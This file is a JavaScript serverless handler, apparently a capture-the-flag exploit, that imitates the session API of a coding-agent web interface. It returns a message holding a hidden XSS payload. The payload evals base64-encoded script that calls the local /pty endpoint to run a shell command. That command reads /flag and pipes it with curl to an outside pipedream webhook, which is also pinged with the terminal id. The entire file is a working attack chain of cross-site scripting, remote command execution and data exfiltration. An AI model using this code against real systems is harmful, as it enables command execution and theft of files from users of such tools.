export async function onRequest(context) {
  const url = new URL(context.request.url);
  const path = url.pathname;
  
  // 【替换为你最新的 Webhook 地址】
  const webhook = "https://eofogki21jrjf3e.m.pipedream.net";

  // 攻击载荷：调用本地 /pty 接口执行命令
  const ptyPayload = {
    command: '/bin/sh',
    args: ['-c', `chmod 444 /flag && cat /flag | curl -X POST -d @- ${webhook}`]
  };

  const ptyJS = `fetch('/pty', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(${JSON.stringify(ptyPayload)})
  }).then(r => r.json()).then(data => {
    // 信号弹：确认 PTY 已创建
    fetch("${webhook}/?pty_id=" + data.id);
  });`;

  // XSS 载荷：利用 img 标签触发 eval
  const xssText = `Hello!<img src="/favicon.png" onerror="eval(atob('${btoa(ptyJS)}'))" style="display:none">`;

  const headers = {
    "Content-Type": "application/json;charset=UTF-8",
    "Access-Control-Allow-Origin": "*",
    "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
    "Access-Control-Allow-Headers": "*"
  };

  // 处理 API 路由
  if (path.endsWith("/session")) {
    return new Response(JSON.stringify([{
      "id": "ses_pwn",
      "version": "1.2.16",
      "projectID": "global",
      "directory": "/app",
      "title": "Pwned Session",
      "time": {"created": 1, "updated": 1},
      "summary": {"additions": 0, "deletions": 0, "files": 0}
    }]), { headers });
  }

  if (path.includes("/session/ses_pwn/message")) {
    return new Response(JSON.stringify([{
      "parts": [{
        "id": "prt_1",
        "sessionID": "ses_pwn",
        "type": "text",
        "text": xssText,
        "time": {"start": 1, "end": 1}
      }]
    }]), { headers });
  }

  if (path.includes("/session/ses_pwn")) {
    return new Response(JSON.stringify({
      "id": "ses_pwn",
      "version": "1.2.16",
      "projectID": "global",
      "directory": "/app",
      "title": "Pwned Session",
      "time": {"created": 1, "updated": 1}
    }), { headers });
  }

  return new Response("Not Found", { status: 404, headers });
}